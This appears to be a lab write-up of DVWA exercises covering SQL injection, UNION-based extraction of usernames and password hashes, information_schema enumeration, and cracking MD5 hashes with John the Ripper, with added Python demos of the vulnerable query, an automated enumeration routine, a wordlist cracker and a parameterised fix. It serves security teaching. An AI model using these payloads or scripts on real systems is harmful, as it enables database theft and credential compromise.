DVWA Exercises 5

09 SQL Injection

The page shows an input field that takes a user ID. In the back end that value is pasted straight into the SQL statement, which could look roughly like this:

SELECT firstname, surname FROM users WHERE uid = '$id';   -- $id comes from $_GET['id'] and is used without any sanitisation

Let's try to inject a SQL fragment instead of a number:

1' or '1' = '1

The first single quote closes the string the application opened, or '1' = '1' is always true, and the quote the application appends after our input closes the last literal. The executed statement becomes ... WHERE uid='1' or '1' = '1', which matches every row and returns every user instead of one.

10 SQL Injection with UNION

With a SQL UNION we can pull data from other tables (or other columns) into the result of the original query.

The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:

SELECT a, b FROM table1 UNION SELECT c, d FROM table2

This SQL query will return a single result set with two columns, containing values from columns a and b in table1 and columns c and d in table2.

For a UNION query to work, two key requirements must be met:

  • The individual queries must return the same number of columns.

  • The data types in each column must be compatible between the individual queries.

Let's try the following payload:

%' or '0'='0' union select user,password from users #

The quote after % closes the string, '0'='0' keeps the original WHERE clause true, the UNION appends the user and password columns of the users table to the result, and the # (a MySQL line comment) discards the closing quote the application adds after our input. The injected SELECT has two columns because the original query (firstname, surname) returns two; a UNION with one or three columns fails with a column-count error, which is also how the number of columns is worked out when the query is not known.
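The two payloads above, run against a small in-memory model of the vulnerable lookup and against the parameterised fix, as an added example (not part of the original write-up or of DVWA). It uses SQLite via Python's sqlite3 module instead of MySQL, so the UNION payload ends in a "-- " comment rather than "#"; the table rows are constructed (made-up names, real MD5 digests of common passwords), and the two lookup functions are assumptions modelling the page's query:

```python
import sqlite3

# Constructed stand-in for DVWA's users table: made-up names, real MD5 digests of
# md5("password"), md5("abc123") and md5("123456"). Not DVWA's own rows.
SAMPLE_USERS = [
    (1, "Ada", "Lovelace", "ada", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Grace", "Hopper", "grace", "e99a18c428cb38d5f260853678922e03"),
    (3, "Alan", "Turing", "alan", "e10adc3949ba59abbe56e057f20f883e"),
]

# The page's payloads. SQLite line comments start with "--" rather than MySQL's "#",
# so the UNION payload ends in "-- " here; everything else is identical.
TAUTOLOGY_PAYLOAD = "1' or '1' = '1"
UNION_PAYLOAD = "%' or '0'='0' union select user,password from users -- "
BAD_UNION_PAYLOAD = "%' or '0'='0' union select user from users -- "  # one column: rejected


def make_db():
    """In-memory database holding the constructed users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER, firstname TEXT, surname TEXT, "
               "user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return db


def lookup_vulnerable(db, user_id):
    """The page's query as written: the id is pasted into the SQL text, so quotes
    inside it become part of the statement."""
    sql = f"SELECT firstname, surname FROM users WHERE uid='{user_id}'"
    return db.execute(sql).fetchall()


def lookup_safe(db, user_id):
    """Parameterised version: the value travels separately from the SQL text and is
    only ever compared against uid; it can never change the statement."""
    sql = "SELECT firstname, surname FROM users WHERE uid=?"
    return db.execute(sql, (user_id,)).fetchall()


def union_column_mismatch_fails(db):
    """UNION needs equal column counts: a one-column injected SELECT raises an error."""
    try:
        lookup_vulnerable(db, BAD_UNION_PAYLOAD)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("normal request   :", lookup_vulnerable(db, "1"))
    print("tautology payload:", lookup_vulnerable(db, TAUTOLOGY_PAYLOAD))  # every user
    print("union payload    :", lookup_vulnerable(db, UNION_PAYLOAD))      # plus user/password pairs
    print("one-column union : fails =", union_column_mismatch_fails(db))
    print("safe, tautology  :", lookup_safe(db, TAUTOLOGY_PAYLOAD))        # no rows
    print("safe, normal     :", lookup_safe(db, "1"))
```

The parameterised lookup returns nothing for either payload because the whole string is compared against uid as a value; the fix is the placeholder, not filtering quotes or the # character.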

11 Further Database Enumeration

Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.

You can query information_schema.tables to list the tables in the database:

SELECT * FROM information_schema.tables

You can then query information_schema.columns to list the columns in individual tables:

SELECT * FROM information_schema.columns WHERE table_name = 'users'

Let's try the following payload, which lists every table name and column name visible to the database user (the output also includes the built-in schemas, so the application's own tables have to be picked out of the list):

%' or '0'='0' union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS #
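The enumeration procedure end to end (find the column count, list the tables, list the columns of one table) through the same UNION channel, as an added example that is not part of the original write-up. It again uses SQLite through Python's sqlite3: SQLite has no information_schema, so sqlite_master stands in for information_schema.tables and the pragma_table_info() table-valued function (SQLite 3.16+) for information_schema.columns; the comment is "--" instead of MySQL's "#". The target table and the inject()/lookup() helpers are constructed assumptions modelling the page's endpoint:

```python
import sqlite3


def make_db():
    """Constructed target with the same shape as the page's users table (made-up row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER, firstname TEXT, surname TEXT, "
               "user TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'Ada', 'Lovelace', 'ada', "
               "'5f4dcc3b5aa765d61d8327deb882cf99')")
    return db


def lookup(db, user_id):
    """The vulnerable endpoint: the id is concatenated straight into the query."""
    sql = f"SELECT firstname, surname FROM users WHERE uid='{user_id}'"
    return db.execute(sql).fetchall()


def inject(db, select_list, from_clause=""):
    """Send one UNION payload through the endpoint. The leading quote closes the
    application's string; '-- ' comments out its trailing quote (MySQL would use '#')."""
    return lookup(db, f"' union select {select_list} {from_clause} -- ")


def find_column_count(db, max_cols=8):
    """Step 1: grow 'union select null, null, ...' until the database stops
    rejecting the UNION for mismatched column counts."""
    for n in range(1, max_cols + 1):
        try:
            inject(db, ", ".join(["null"] * n))
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("column count not found")


def pad(exprs, ncols):
    """Fill the remaining UNION columns with NULL so the counts line up."""
    assert len(exprs) <= ncols, "the original query has too few columns to carry these values"
    return ", ".join(exprs + ["null"] * (ncols - len(exprs)))


def enumerate_tables(db, ncols):
    """Step 2: table names. sqlite_master plays the role of information_schema.tables."""
    rows = inject(db, pad(["name"], ncols), "from sqlite_master where type='table'")
    return {row[0] for row in rows if row[0] is not None}


def enumerate_columns(db, table, ncols):
    """Step 3: column names and declared types of one table. pragma_table_info()
    plays the role of information_schema.columns."""
    rows = inject(db, pad(["name", "type"], ncols), f"from pragma_table_info('{table}')")
    return {(row[0], row[1]) for row in rows if row[0] is not None}


if __name__ == "__main__":
    db = make_db()
    n = find_column_count(db)
    print("columns in the original query:", n)
    for table in sorted(enumerate_tables(db, n)):
        print(table, "->", sorted(enumerate_columns(db, table, n)))
```

On MySQL the same three steps use the page's payload shape; adding WHERE table_schema = database() to the information_schema.columns query restricts the dump to the application's own database instead of every schema the account can read.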

12 Crack the password hashes

I put the collected password hashes in a file, hashes.txt, one hash per line, and try to crack them with John the Ripper.

First I check the hash type with hash-identifier: the values are 32 hexadecimal characters, which points to unsalted MD5 and matches john's raw MD5 format. Then I run john with that format and the rockyou wordlist:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes.txt
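What those two steps do, written out in miniature as an added example (not the page's commands and not John the Ripper's code): a format guess from length and prefix, then a raw-MD5 wordlist attack with a few john-style mangling rules. The hash list and the tiny wordlist are constructed for the demo; the first three digests are the real MD5 values of "password", "abc123" and "123456", the fourth is a placeholder that nothing in the wordlist produces:

```python
import hashlib
import re

# Constructed stand-in for hashes.txt: three real MD5 digests of well-known weak
# passwords plus one constructed value that stays uncracked.
HASHES = [
    "5f4dcc3b5aa765d61d8327deb882cf99",   # md5("password")
    "e99a18c428cb38d5f260853678922e03",   # md5("abc123")
    "e10adc3949ba59abbe56e057f20f883e",   # md5("123456")
    "00000000000000000000000000000000",   # constructed: no wordlist entry hashes to this
]

# Tiny constructed stand-in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["letmein", "dragon", "password", "qwerty", "abc123", "123456"]


def identify_hash(h):
    """What hash-identifier does by hand: candidate formats from prefix, length and
    alphabet. A bare 32-hex string is ambiguous (MD5, NTLM, MD4); context decides."""
    prefixed = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                "$5$": "sha256crypt", "$6$": "sha512crypt"}
    for prefix, name in prefixed.items():
        if h.startswith(prefix):
            return [name]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        by_len = {32: ["MD5", "NTLM", "MD4"], 40: ["SHA-1"], 64: ["SHA-256"], 128: ["SHA-512"]}
        return by_len.get(len(h), ["unknown hex digest"])
    return ["unknown"]


def mangle(word):
    """A handful of rules in the spirit of john's wordlist mode (not john's rule set)."""
    return [word, word.capitalize(), word.upper(), word + "1", word + "123", word + "!"]


def crack_raw_md5(hashes, words):
    """john --format=raw-md5 --wordlist=... in miniature: hash each candidate once and
    look it up in the target set, so the cost is linear in the candidate count."""
    targets = {h.lower() for h in hashes}
    cracked = {}
    for word in words:
        for candidate in mangle(word):
            digest = hashlib.md5(candidate.encode()).hexdigest()
            if digest in targets and digest not in cracked:
                cracked[digest] = candidate
        if len(cracked) == len(targets):
            break
    return cracked


def uncracked(hashes, cracked):
    """Hashes the wordlist did not recover (john would leave these for a rules or mask run)."""
    return {h.lower() for h in hashes} - set(cracked)


if __name__ == "__main__":
    print("format guess:", identify_hash(HASHES[0]))
    found = crack_raw_md5(HASHES, WORDLIST)
    for digest, plain in found.items():
        print(f"{digest}:{plain}")          # same hash:plain shape as john's pot file
    print("uncracked:", len(uncracked(HASHES, found)))
```

With the real tool, john --show --format=raw-md5 hashes.txt prints the cracked hash:password pairs afterwards; if a 32-hex hash set came from a Windows host rather than a web application, the same wordlist run is repeated with --format=NT, because NTLM hashes have the same length.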
